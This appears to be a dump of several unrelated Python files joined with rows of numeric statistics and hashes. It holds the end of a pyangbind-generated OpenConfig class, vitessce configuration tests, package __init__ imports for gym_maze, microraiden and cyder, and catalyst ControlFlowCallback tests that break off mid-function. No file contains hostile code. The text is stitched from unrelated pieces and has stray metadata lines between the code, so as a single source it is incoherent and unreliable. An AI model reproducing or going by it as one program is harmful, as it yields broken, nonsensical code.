Portions of this code were derived from IETF RFC 7317.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
__slots__ = ('_path_helper', '_extmethods', '__system',)
_yang_name = 'openconfig-system'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_system(self):
"""
Getter method for system, mapped from YANG variable /system (container)
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
return self.__system
def _set_system(self, v, load=False):
"""
Setter method for system, mapped from YANG variable /system (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_system is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_system() directly.
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """system must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)""",
})
self.__system = t
if hasattr(self, '_set'):
self._set()
def _unset_system(self):
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
system = __builtin__.property(_get_system, _set_system)
_pyangbind_elements = OrderedDict([('system', system), ])
| 42.178075
| 367
| 0.735071
| 10,033
| 75,794
| 5.401874
| 0.037476
| 0.033212
| 0.037198
| 0.021256
| 0.992343
| 0.988339
| 0.988339
| 0.988339
| 0.988339
| 0.988339
| 0
| 0.002436
| 0.176637
| 75,794
| 1,796
| 368
| 42.201559
| 0.866023
| 0.421709
| 0
| 0.976398
| 0
| 0.014907
| 0.241283
| 0.057936
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074534
| false
| 0
| 0.034783
| 0
| 0.280745
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53598bc85aa11d1c2ca7ce442a369d4f52e30826
| 17,536
|
py
|
Python
|
tests/test_config.py
|
sehilyi/vitessce-python
|
f3dd3ac6fa8bb66e3b25a4e396f16c1a29ce5573
|
[
"MIT"
] | null | null | null |
tests/test_config.py
|
sehilyi/vitessce-python
|
f3dd3ac6fa8bb66e3b25a4e396f16c1a29ce5573
|
[
"MIT"
] | null | null | null |
tests/test_config.py
|
sehilyi/vitessce-python
|
f3dd3ac6fa8bb66e3b25a4e396f16c1a29ce5573
|
[
"MIT"
] | null | null | null |
import json
import unittest
from vitessce import (
VitessceConfig,
CoordinationType as ct,
Component as cm,
DataType as dt,
FileType as ft,
hconcat,
vconcat,
)
class TestConfig(unittest.TestCase):
def test_config_creation(self):
vc = VitessceConfig()
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [],
"coordinationSpace": {},
"layout": [],
"initStrategy": "auto"
})
def test_config_add_dataset(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [],
"initStrategy": "auto"
})
def test_config_add_dataset_add_files(self):
vc = VitessceConfig()
my_dataset = (vc.add_dataset(name='My Chained Dataset')
.add_file(
url="http://example.com/cells.json",
data_type=dt.CELLS,
file_type=ft.CELLS_JSON,
).add_file(
url="http://example.com/cell_sets.json",
data_type=dt.CELL_SETS,
file_type=ft.CELL_SETS_JSON,
)
)
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Chained Dataset',
'files': [
{
'url': 'http://example.com/cells.json',
'type': 'cells',
'fileType': 'cells.json'
},
{
'url': 'http://example.com/cell_sets.json',
'type': 'cell-sets',
'fileType': 'cell-sets.json'
}
]
},
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [],
"initStrategy": "auto"
})
def test_config_add_spatial_view(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
my_view = vc.add_view(my_dataset, cm.SPATIAL)
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'h': 1,
'w': 1,
'x': 0,
'y': 0
}
],
"initStrategy": "auto"
})
def test_config_add_scatterplot_view_with_mapping(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
my_view = vc.add_view(my_dataset, cm.SCATTERPLOT, mapping="X_umap")
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
'embeddingType': {
'A': 'X_umap'
}
},
"layout": [
{
'component': 'scatterplot',
'coordinationScopes': {
'dataset': 'A',
'embeddingType': 'A'
},
'h': 1,
'w': 1,
'x': 0,
'y': 0
}
],
"initStrategy": "auto"
})
def test_config_add_scatterplot_view_with_embedding_coordinations(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
my_view = vc.add_view(my_dataset, cm.SCATTERPLOT)
et_scope, ez_scope, ex_scope, ey_scope = vc.add_coordination(ct.EMBEDDING_TYPE, ct.EMBEDDING_ZOOM, ct.EMBEDDING_TARGET_X, ct.EMBEDDING_TARGET_Y)
my_view.use_coordination(et_scope, ez_scope, ex_scope, ey_scope)
et_scope.set_value("X_pca")
ez_scope.set_value(2)
ex_scope.set_value(10)
ey_scope.set_value(11)
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
'embeddingType': {
'A': 'X_pca'
},
'embeddingZoom': {
'A': 2
},
'embeddingTargetX': {
'A': 10
},
'embeddingTargetY': {
'A': 11
},
},
"layout": [
{
'component': 'scatterplot',
'coordinationScopes': {
'dataset': 'A',
'embeddingType': 'A',
'embeddingZoom': 'A',
'embeddingTargetX': 'A',
'embeddingTargetY': 'A',
},
'h': 1,
'w': 1,
'x': 0,
'y': 0
}
],
"initStrategy": "auto"
})
def test_config_add_dataset_add_objects(self):
vc = VitessceConfig()
class MockAnnData:
def __init__(self, name):
self.name = name
def serve_obj(obj, obj_i, dataset_uid):
if type(obj) == MockAnnData:
if obj.name == "Experiment A":
return [
{
"url": "http://localhost:8000/cells",
"type": "cells",
"fileType": "cells.json"
},
{
"url": "http://localhost:8000/molecules",
"type": "molecules",
"fileType": "molecules.json"
}
]
elif obj.name == "Experiment B":
return [
{
"url": "http://localhost:8000/cell-sets",
"type": "cell-sets",
"fileType": "cell-sets.json"
}
]
return None
my_dataset = (vc.add_dataset(name='My Object Dataset')
.add_object(
obj=MockAnnData("Experiment A")
).add_object(
obj=MockAnnData("Experiment B")
)
)
vc_dict = vc.to_dict(on_obj=serve_obj)
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Object Dataset',
'files': [
{
"url": "http://localhost:8000/cells",
"type": "cells",
"fileType": "cells.json"
},
{
"url": "http://localhost:8000/molecules",
"type": "molecules",
"fileType": "molecules.json"
},
{
"url": "http://localhost:8000/cell-sets",
"type": "cell-sets",
"fileType": "cell-sets.json"
}
]
},
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [],
"initStrategy": "auto"
})
def test_config_set_layout_single_view(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
my_view = vc.add_view(my_dataset, cm.SPATIAL)
vc.layout(my_view)
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 0,
'y': 0,
'h': 12,
'w': 12,
}
],
"initStrategy": "auto"
})
def test_config_set_layout_multi_view(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
v1 = vc.add_view(my_dataset, cm.SPATIAL)
v2 = vc.add_view(my_dataset, cm.SPATIAL)
v3 = vc.add_view(my_dataset, cm.SPATIAL)
vc.layout(hconcat(v1, vconcat(v2, v3)))
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 0,
'y': 0,
'h': 12,
'w': 6,
},
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 6,
'y': 0,
'h': 6,
'w': 6,
},
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 6,
'y': 6,
'h': 6,
'w': 6,
}
],
"initStrategy": "auto"
})
def test_config_set_layout_multi_view_magic(self):
vc = VitessceConfig()
my_dataset = vc.add_dataset(name='My Dataset')
v1 = vc.add_view(my_dataset, cm.SPATIAL)
v2 = vc.add_view(my_dataset, cm.SPATIAL)
v3 = vc.add_view(my_dataset, cm.SPATIAL)
vc.layout(v1 | (v2 / v3))
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "",
"description": "",
"datasets": [
{
'uid': 'A',
'name': 'My Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
},
"layout": [
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 0,
'y': 0,
'h': 12,
'w': 6,
},
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 6,
'y': 0,
'h': 6,
'w': 6,
},
{
'component': 'spatial',
'coordinationScopes': {
'dataset': 'A',
},
'x': 6,
'y': 6,
'h': 6,
'w': 6,
}
],
"initStrategy": "auto"
})
def test_load_config(self):
vc = VitessceConfig.from_dict({
"version": "1.0.0",
"name": "Test name",
"description": "Test description",
"datasets": [
{
'uid': 'A',
'name': 'My First Dataset',
'files': [
{
'url': 'http://cells.json',
'type': 'cells',
'fileType': 'cells.json'
}
]
}
],
'coordinationSpace': {
'dataset': {
'A': 'A'
},
'spatialZoom': {
'ABC': 11
},
},
"layout": [
{
"component": "spatial",
"props": {
"cellRadius": 50
},
"coordinationScopes": {
"spatialZoom": 'ABC'
},
"x": 5,
"y": 0,
"w": 4,
"h": 4
},
],
"initStrategy": "auto"
})
my_second_dataset = vc.add_dataset(name='My Second Dataset')
vc_dict = vc.to_dict()
vc_json = json.dumps(vc_dict)
self.assertEqual(vc_dict, {
"version": "1.0.0",
"name": "Test name",
"description": "Test description",
"datasets": [
{
'uid': 'A',
'name': 'My First Dataset',
'files': [
{
'url': 'http://cells.json',
'type': 'cells',
'fileType': 'cells.json'
}
]
},
{
'uid': 'B',
'name': 'My Second Dataset',
'files': []
}
],
'coordinationSpace': {
'dataset': {
'A': 'A',
'B': 'B'
},
'spatialZoom': {
'ABC': 11,
},
},
"layout": [
{
"component": "spatial",
"props": {
"cellRadius": 50
},
"coordinationScopes": {
"spatialZoom": 'ABC'
},
"x": 5,
"y": 0,
"w": 4,
"h": 4
},
],
"initStrategy": "auto"
})
| 29.373534
| 152
| 0.320255
| 1,187
| 17,536
| 4.559393
| 0.104465
| 0.036585
| 0.033629
| 0.028825
| 0.819845
| 0.798041
| 0.775868
| 0.752033
| 0.705469
| 0.691981
| 0
| 0.018177
| 0.554516
| 17,536
| 596
| 153
| 29.422819
| 0.674603
| 0
| 0
| 0.621818
| 0
| 0
| 0.171029
| 0
| 0
| 0
| 0
| 0
| 0.02
| 1
| 0.023636
| false
| 0
| 0.005455
| 0
| 0.038182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
536ef3f253904367c74bf94586189e7102090467
| 87
|
py
|
Python
|
gym_maze/envs/__init__.py
|
omar-bfs/DQN
|
50181a2340a49c81476f56b7c74ec8572f4a9042
|
[
"MIT"
] | 3
|
2021-08-13T17:02:06.000Z
|
2022-03-12T06:30:26.000Z
|
gym_maze/envs/__init__.py
|
omar-bfs/DQN
|
50181a2340a49c81476f56b7c74ec8572f4a9042
|
[
"MIT"
] | null | null | null |
gym_maze/envs/__init__.py
|
omar-bfs/DQN
|
50181a2340a49c81476f56b7c74ec8572f4a9042
|
[
"MIT"
] | null | null | null |
from gym_maze.envs.maze_env import *
from gym_maze.envs.maze_view_2d import MazeView2D
| 29
| 49
| 0.850575
| 16
| 87
| 4.3125
| 0.5625
| 0.202899
| 0.318841
| 0.434783
| 0.550725
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025316
| 0.091954
| 87
| 2
| 50
| 43.5
| 0.848101
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
72674cee2ac8b91845475a8e6d2c55824c52ee04
| 1,658
|
py
|
Python
|
microraiden/utils/__init__.py
|
andrevmatos/microraiden
|
2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd
|
[
"MIT"
] | 417
|
2017-09-19T19:06:23.000Z
|
2021-11-28T05:39:23.000Z
|
microraiden/utils/__init__.py
|
andrevmatos/microraiden
|
2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd
|
[
"MIT"
] | 259
|
2017-09-19T20:42:57.000Z
|
2020-11-18T01:31:41.000Z
|
microraiden/utils/__init__.py
|
andrevmatos/microraiden
|
2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd
|
[
"MIT"
] | 126
|
2017-09-19T17:11:39.000Z
|
2020-12-17T17:05:27.000Z
|
from .crypto import (
generate_privkey,
pubkey_to_addr,
privkey_to_addr,
addr_from_sig,
pack,
keccak256,
keccak256_hex,
sign,
sign_transaction,
eth_message_hash,
eth_sign,
eth_verify,
eth_sign_typed_data_message,
eth_sign_typed_data,
eth_sign_typed_data_message_eip,
eth_sign_typed_data_eip,
get_balance_message,
sign_balance_proof,
verify_balance_proof,
sign_close,
verify_closing_sig
)
from .contract import (
create_signed_transaction,
create_transaction,
create_signed_contract_transaction,
create_contract_transaction,
create_transaction_data,
get_logs,
get_event_blocking,
wait_for_transaction
)
from .private_key import (
check_permission_safety,
get_private_key
)
from .misc import (
get_function_kwargs,
pop_function_kwargs
)
__all__ = [
generate_privkey,
pubkey_to_addr,
privkey_to_addr,
addr_from_sig,
pack,
keccak256,
keccak256_hex,
sign,
sign_transaction,
eth_message_hash,
eth_sign,
eth_verify,
eth_sign_typed_data_message,
eth_sign_typed_data,
eth_sign_typed_data_message_eip,
eth_sign_typed_data_eip,
get_balance_message,
sign_balance_proof,
verify_balance_proof,
sign_close,
verify_closing_sig,
create_signed_transaction,
create_transaction,
create_signed_contract_transaction,
create_contract_transaction,
create_transaction_data,
get_logs,
get_event_blocking,
wait_for_transaction,
check_permission_safety,
get_private_key,
get_function_kwargs,
pop_function_kwargs,
]
| 19.738095
| 39
| 0.735826
| 202
| 1,658
| 5.410891
| 0.217822
| 0.064044
| 0.087832
| 0.117109
| 0.935041
| 0.935041
| 0.810613
| 0.810613
| 0.810613
| 0.810613
| 0
| 0.009252
| 0.217732
| 1,658
| 83
| 40
| 19.975904
| 0.833462
| 0
| 0
| 0.763158
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
727f8247ba57ff4fc9b3c023a24f2aeb907d48b2
| 88
|
py
|
Python
|
cyder/cydns/cybind/tests/test_models.py
|
ngokevin/chili
|
36c354ac567471d5e36dccf9eea5096c6b02d4b9
|
[
"BSD-3-Clause"
] | 2
|
2019-03-16T00:47:09.000Z
|
2022-03-04T14:39:08.000Z
|
cyder/cydns/cybind/tests/test_models.py
|
ngokevin/chili
|
36c354ac567471d5e36dccf9eea5096c6b02d4b9
|
[
"BSD-3-Clause"
] | 1
|
2020-04-24T08:24:55.000Z
|
2020-04-24T08:24:55.000Z
|
cyder/cydns/cybind/tests/test_models.py
|
ngokevin/chili
|
36c354ac567471d5e36dccf9eea5096c6b02d4b9
|
[
"BSD-3-Clause"
] | null | null | null |
from cydns.cybind.tests.dirty_soa import *
from cydns.cybind.tests.build_tests import *
| 29.333333
| 44
| 0.818182
| 14
| 88
| 5
| 0.571429
| 0.257143
| 0.428571
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 88
| 2
| 45
| 44
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
72cf11ddf0511d385dbdb76498f89badee9fe097
| 17,566
|
py
|
Python
|
tests/catalyst/callbacks/test_control_flow.py
|
gr33n-made/catalyst
|
bd413abc908ef7cbdeab42b0e805277a791e3ddb
|
[
"Apache-2.0"
] | 1
|
2021-03-02T12:06:32.000Z
|
2021-03-02T12:06:32.000Z
|
tests/catalyst/callbacks/test_control_flow.py
|
gr33n-made/catalyst
|
bd413abc908ef7cbdeab42b0e805277a791e3ddb
|
[
"Apache-2.0"
] | null | null | null |
tests/catalyst/callbacks/test_control_flow.py
|
gr33n-made/catalyst
|
bd413abc908ef7cbdeab42b0e805277a791e3ddb
|
[
"Apache-2.0"
] | 1
|
2021-06-11T16:33:30.000Z
|
2021-06-11T16:33:30.000Z
|
# flake8: noqa
import random
import unittest
from unittest.mock import Mock
from catalyst.dl import Callback, CallbackOrder, ControlFlowCallback
class _Runner:
def __init__(self, stage, loader_key, global_epoch, epoch):
self.stage_key = stage
self.loader_key = loader_key
self.global_epoch_step = global_epoch
self.stage_epoch_step = epoch
class DummyCallback(Callback):
def __init__(self):
super().__init__(CallbackOrder.Internal)
class Dummy(Exception):
pass
def _raise(runner: "IRunner"):
raise Dummy()
class RaiserCallback(Callback):
def __init__(self, order, method_to_raise: str):
super().__init__(order)
setattr(self, method_to_raise, _raise)
def test_controll_flow_callback_filter_fn_periodical_epochs():
wraped = ControlFlowCallback(DummyCallback(), epochs=3)
mask = [i % 3 == 0 for i in range(1, 10 + 1)]
expected = {
"train": mask,
"valid": mask,
"another_loader": mask,
"like_valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 10 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_periodical_ignore_epochs():
wraped = ControlFlowCallback(DummyCallback(), ignore_epochs=4)
mask = [i % 4 != 0 for i in range(1, 10 + 1)]
expected = {
"train": mask,
"valid": mask,
"another_loader": mask,
"like_valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 10 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_epochs():
wraped = ControlFlowCallback(DummyCallback(), epochs=[3, 4, 6])
mask = [
False,
False,
True,
True,
False,
True,
False,
False,
False,
False,
]
expected = {
"train": mask,
"valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 10 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_global_epochs():
wraped = ControlFlowCallback(DummyCallback(), epochs=[3, 4, 7, 10], use_global_epochs=True)
mask = [
False,
False,
True,
True,
False,
False,
True,
False,
False,
True,
]
expected = {
"train": mask,
"valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for stage_num, stage in enumerate(["stage1", "stage2"]):
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner(stage, loader, epoch + stage_num * 5, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_ignore_epochs():
wraped = ControlFlowCallback(DummyCallback(), ignore_epochs=[3, 4, 6, 8])
mask = [
True,
True,
False,
False,
True,
False,
True,
False,
True,
True,
]
expected = {
"train": mask,
"valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 10 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_controll_flow_callback_filter_fn_global_ignore_epochs():
wraped = ControlFlowCallback(
DummyCallback(), ignore_epochs=[3, 4, 7, 10], use_global_epochs=True
)
mask = [
True,
True,
False,
False,
True,
True,
False,
True,
True,
False,
]
expected = {
"train": mask,
"valid": mask,
}
actual = {loader: [] for loader in expected.keys()}
for stage_num, stage in enumerate(["stage1", "stage2"]):
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner(stage, loader, epoch + stage_num * 5, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_loaders():
wraped = ControlFlowCallback(DummyCallback(), loaders=["valid"])
expected = {
"train": [False] * 5,
"valid": [True] * 5,
"another_loader": [False] * 5,
"like_valid": [False] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_ignore_loaders():
wraped = ControlFlowCallback(DummyCallback(), ignore_loaders=["valid", "another_loader"])
expected = {
"train": [True] * 5,
"valid": [False] * 5,
"another_loader": [False] * 5,
"like_valid": [True] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_multiple_epochs_loaders():
wraped = ControlFlowCallback(DummyCallback(), loaders={"valid": 3, "another_loader": [2, 4]})
expected = {
"train": [False] * 5,
"valid": [False, False, True, False, False],
"another_loader": [False, True, False, True, False],
"like_valid": [False] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_multiple_epochs_ignore_loaders():
wraped = ControlFlowCallback(
DummyCallback(), ignore_loaders={"valid": 3, "another_loader": [2, 4]}
)
expected = {
"train": [True] * 5,
"valid": [True, True, False, True, True],
"another_loader": [True, False, True, False, True],
"like_valid": [True] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_string_lambda():
wraped = ControlFlowCallback(
DummyCallback(), filter_fn="lambda stage, epoch, loader: 'valid' in loader",
)
expected = {
"train": [False] * 5,
"valid": [True] * 5,
"another_loader": [False] * 5,
"like_valid": [True] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
def test_control_flow_callback_filter_fn_lambda():
wraped = ControlFlowCallback(
DummyCallback(), filter_fn=lambda stage, epoch, loader: "valid" not in loader,
)
expected = {
"train": [True] * 5,
"valid": [False] * 5,
"another_loader": [True] * 5,
"like_valid": [False] * 5,
}
actual = {loader: [] for loader in expected.keys()}
for epoch in range(1, 5 + 1):
for loader in expected.keys():
runner = _Runner("stage", loader, epoch, epoch)
wraped.on_loader_start(runner)
actual[loader].append(wraped._is_enabled)
assert actual == expected
class TestControlFlowCallback(unittest.TestCase):
def test_with_missing_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
for order in orders:
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback)
def test_epochs_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback, epochs=None)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, epochs="123456")
def test_ignore_epochs_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_epochs=None)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_epochs="123456")
def test_loaders_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
